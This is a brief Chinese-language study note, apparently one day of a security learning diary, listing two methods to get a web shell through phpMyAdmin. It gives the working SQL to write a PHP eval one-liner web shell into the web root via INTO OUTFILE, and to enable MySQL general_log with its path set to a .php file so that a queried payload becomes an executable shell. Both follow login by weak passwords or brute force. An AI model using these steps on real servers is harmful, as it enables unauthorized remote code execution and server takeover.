PHPmyadmin Getshell（10.25 第二十七天）

PHPmyadmin Getshell的方法
（1）show global variables like '% secure-file-priv%' 如果该参数设置为空或者指定的文件夹可以利用，然后写木马。
select "<?php @eval($_POST[k]);?>" into outfile "/var/www/html/conf.php";
（2）利用日志文件getshell
常见的日志文件分为业务日志（常见服务）和系统日志（windows、linux），利用phpmyadmin的日志文件去getshell，（mysql>5.0会创建日志文件，日志文件是全局变量，是可以读写的）利用过程如下：
1、通过弱口令或者爆破的方式登录phpmyadmin，
执行sql语句：SELECT @@datadir 然后去猜测源码存放的方式（www）
查看日志状态：SHOW variables like '%general%';
2、开启日志记录功能并且修改记录的路径和文件名
开启日志记录功能：SET GLOBAL general_log='on'
修改路径：SET GLOBAL general_log_file='D:\\phpStudy_64\\phpstudy_pro\\www\\log.php';
写入木马：SELECT '<?php eval($_POST[k]);?>';